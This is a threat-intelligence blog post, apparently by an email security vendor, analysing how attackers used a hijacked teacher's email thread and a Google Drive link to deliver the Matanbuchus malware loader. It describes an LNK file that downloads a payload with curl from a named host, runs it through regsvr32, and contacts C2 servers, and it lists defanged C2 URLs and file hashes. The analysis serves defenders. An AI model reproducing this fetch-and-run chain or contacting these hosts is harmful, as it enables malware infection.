Abstract Violet Wavy

Google Drive as a Distribution Method for Matanbuchus Malware

In this attack, threat actors impersonate a teacher to deliver Matanbuchus malware-as-a-service (MaaS) using a Google Drive link.

August 18, 2022

Initially launched in February 2021, Matanbuchus is a malware-as-a-service (MaaS) available on Russian-speaking cybercrime forums.

Similar to other malware loaders like BazarLoader, Matanbuchus is a malicious software that is designed to download and run second-stage executable files from command and control (C&C or C2) servers without detection. According to Matanbuchus’ author, the malware has the ability to launch a .exe or .dll file in memory, run custom PowerShell commands, and more.

Abnormal recently observed a new approach to delivering the malware loader. Combining more convincing social engineering tactics with legitimate infrastructure—in this case Google Drive—threat actors are able to launch an attack that is significantly more difficult to detect.

Hijacking an Email Thread Using a Compromised Account

In June 2022, Abnormal was able to detect an email purportedly sent from a teacher from a well-known district school. Using a hijacked thread, the attackers were able to leverage the teacher’s identity and the real school at which she worked as a way to avoid detection. Additionally, the email account used for the delivery of this mail comes from a legitimate domain that is presumed to have been compromised.

The attackers took advantage of multiple elements to not only create an appearance of credibility to fool targets but also obfuscate the malware to bypass email security. The diagram below shows the flow of the attack detected by Abnormal up to the point of downloading the Matanbuchus malware, which would eventually download another family of malware like Cobalt Strike.

Matanbuchus 1 Attack Flow

Matanbuchus malware attack flow

Threat Analysis

The impersonated party in this attack is a teacher who is employed by the district school and is also a member of a group that supports the school community. The attack begins with the hijacked thread from the teacher inviting recipients to participate in the next community meeting. The message includes a Google Drive URL, which the threat actor claims is a link to a document related to the event.

Matanbuchus 2 Phishing Email

Phishing email

This Google Drive link downloads a zip file with a LNK file inside.

Matanbuchus 3 Google Drive Zip File

Zip file downloaded from Google Drive link

Within its properties, the LNK file has the command-line argument that it needs to initiate the second stage.

Matanbuchus 4 Lnk Properties

LNK properties

Only a small snippet of the target path is visible; however, the command-line argument extends beyond what the victim can see.

Matanbuchus 5 Argument in Lnk Target Property

Complete argument in the LNK target property

The first step in this argument is to create the hP folder and then check the internet connection pinging Mh4m[.]com and 4umz[.]com. The malicious file uses clean URLs so as not to be detected as suspicious network traffic.

Matanbuchus 6 Lnk Checking Internet Connection

LNK file checking the internet connection

The second step in the argument is to download a second file, using curl, from https://re9cred[.]com/N9tIgZB/Wq[.]png. The file uVbU.UEMX.pafB is saved in the hidden directory ..\AppData\Roaming\hP, which makes it imperceptible to the victim.

Matanbuchus 7 Second File Downloaded Using Curl

Second file downloaded via curl

The second file is running with regsvr32. The malicious file has different domains to reach out to download a third file and increase the download success.

Matanbuchus 8 Different C2 Domains

Different C2 available to download Matanbuchus

The file establishes a connection with the C2 telemetryreporting[.]com and IP 31[.]41[.]244[.]234 and downloads the malware Matanbuchus. All of the network traffic is using base64 encoding as an anti-detection technique.

Matanbuchus 9 Wireshark Downloading Matanbuchus

Wireshark packages downloading malware encoded in base64

Matanbuchus malware is saved in the hidden directory ..\AppData\Local\9e0a with the name x86.nls.

Matanbuchus 10 Hidden Directory in Local File

Malware saved in the local folder as x86.nls

After downloading the malware, the connection with the C2 31[.]41[.]244[.]230 is still sending the same information from the host to maintain the established connection.

Matanbuchus 11 C2 Connection Established

Connection established with the C2

As we saw before, the traffic is encoded in base64.

Matanbuchus 12 HTTP POST Request Package

HTTP POST request package from the C2 network traffic

In this case, after decoding the base64 we can see different arguments, potentially related to the victim's configuration system.

Matanbuchus 13 Base64 Decoded C2 Network Traffic

Base64 decoded C2 network traffic

Blocking Advanced Malware Attacks

The threat actors used a powerful combination of tactics to launch this attack: impersonating an actual teacher at a well-known school, exploiting a legitimate domain, leveraging Google Drive as the infrastructure, and using a sophisticated malware loader. Because the foundation of the attack is legitimate elements, it enables the threat actors to more easily fool the target and execute the multi-stage attack.

In addition, the technique of decoding malicious code in memory makes it more difficult for security systems to detect the malware. A traditional email security platform would be incapable of stopping an attack with this level of complexity. Effectively blocking these kinds of attacks requires a solution designed specifically to detect these indicators of compromise.

Indicators of Compromise (IOCs)

0a82b9ef75d1d2a3914e6609070da138ec4b724fc62753290d8c4fc51818d0a6

Zip file

86fb578acbb309cfc693f21970a3ed5f678126161a177e2bdc4cb80d256aca8c

LNK file

3ab3a642a8a02b18ff39c664dc82a1b68bf7b1a8574a54838d75279d262d0737

Malicious dll

48ad2fadb0550066f0ee1d20b73cdb397c53479152c2f3d14fe7d09b8a972117

Matanbuchus

https://re9cred[.]com/N9tIgZB/Wq[.]png

C2

https://communicationreporting[.]com/mtaggsM/YmQzcuM/auth[.]aspx

C2

https://telemetryservic[.]com/mtaggsM/YmQzcuM/auth[.]aspx

C2

https://telemetryservic[.]com/mtaggsM/YmQzcuM/home[.]aspx

C2

http://telemetryreporting[.]com/mtaggsM/YmQzcuM/home[.]aspx

C2

http://updatesservic[.]com/mtaggsM/YmQzcuM/home[.]aspx

C2

Image

Prevent the Attacks That Matter Most

Get the Latest Email Security Insights

Subscribe to our newsletter to receive updates on the latest attacks and new trends in the email threat landscape.

0
Demo 2x 1

See the Abnormal Solution to the Email Security Problem

Protect your organization from the attacks that matter most with Abnormal Integrated Cloud Email Security.

Related Posts

B 09 29 22 CISO Cybersecurity Awareness Month
October is here, which means Cybersecurity Awareness Month is officially in full swing! These five tips can help security leaders take full advantage of the month.
Read More
B Email Security Challenges Blog 09 26 22
Understanding common email security challenges caused by your legacy technology will help you determine the best solution to improve your security posture.
Read More
B 5 Crucial Tips
Retailers are a popular target for threat actors due to their wealth of customer data and availability of funds. Here are 5 cybersecurity tips to help retailers reduce their risk of attack.
Read More
B 3 Essential Elements
Legacy approaches to managing unwanted mail are neither practical nor scalable. Learn the 3 essential elements of modern, effective graymail management.
Read More
B Back to School
Discover how threat group Chiffon Herring leverages impersonation and spoofed email addresses to divert paychecks to mule accounts.
Read More
B 09 06 22 Rearchitecting a System Blog
We recently shared a look at how the Abnormal engineering team overhauled our Unwanted Mail service architecture to accommodate our rapid growth. Today, we’re diving into how the team migrated traffic to the new architecture—with zero downtime.
Read More
B Industry Leading CIS Os
Stay up to date on the latest cybersecurity trends, industry news, and best practices by following these 12 innovative and influential thought leaders on social media.
Read More
B Podcast Engineering 11 08 24 22
In episode 11 of Abnormal Engineering Stories, David Hagar, Director of Engineering and Abnormal Head of UK Engineering, continues his conversation with Zehan Wang, co-founder of Magic Pony.
Read More
B Overhauled Architecture Blog 08 29 22
As our customer base has expanded, so has the volume of emails our system processes. Here’s how we overcame scaling challenges with one service in particular.
Read More